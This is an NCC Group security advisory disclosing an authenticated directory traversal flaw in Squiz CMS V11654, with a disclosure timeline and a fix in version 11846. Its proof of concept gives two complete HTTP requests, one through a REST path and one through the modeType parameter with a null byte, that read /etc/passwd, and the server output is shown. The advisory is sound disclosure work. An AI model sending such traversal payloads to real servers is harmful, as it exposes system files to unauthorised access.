NGS000330 Technical Advisory: Squiz CMS File Path Traversal

[NCC Group Research <research () nccgroup com>]

=======
Summary
=======
Name: Squiz CMS - File Path Traversal
Release Date: 30 November 2012
Reference: NGS00330
Discoverer: Robert Ray <robert.ray () ngssecure com>
Vendor: Squiz
Vendor Reference: 11846
Systems Affected: Squiz CMS V11654 
Risk: High
Status: Published

========
TimeLine
========
Discovered: 29 June 2012
Released: 29 June 2012
Approved:  2 July 2012
Reported:  9 July 2012
Fixed:  9 August 2012
Published: 30 November 2012

===========
Description
===========
Squiz CMS V11654 - File Path Traversal

I. VULNERABILITY
-------------------------
The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated 
attackers to gain access to arbitrary system files.

II. BACKGROUND
-------------------------
Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, 
Associations & Not For Profit, Corporate, Finance & Professional Services, Cultural Institutions, Education, Government 
& Public Sector, Health & Social Services, Media &
Publishing, Travel & Tourism etc.

http://www.squiz.co.uk/showcase/

III. DESCRIPTION
-------------------------
Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is 
possible for users to self register within the software if configured for this use case.

=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------

The vulnerabilities detected include method by means of a REST parameter:

GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: */*
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4

HTTP/1.1 200 OK
Content-type: application/octet-stream
Expires: Sun, 1 Jul 2012 00:00:00
Last-Modified: Sat, 30 Jun 2012 00:00:00
Content-Length: 1236
Date: Fri, 29 Jun 2012 21:46:36 GMT
Server: lighttpd/1.4.28

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

And also by means of the "modeType" GET parameter.

GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00  HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: */*
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4

HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Date: Fri, 29 Jun 2012 19:56:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1236

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

===============
Fix Information
===============
The vendor has released an update to address this issue. Fixed in version
11846.

http://cms.squizsuite.net/download 


NCC Group Research
http://www.nccgroup.com/research


For more information please visit <a href="http://www.mimecast.com";>http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>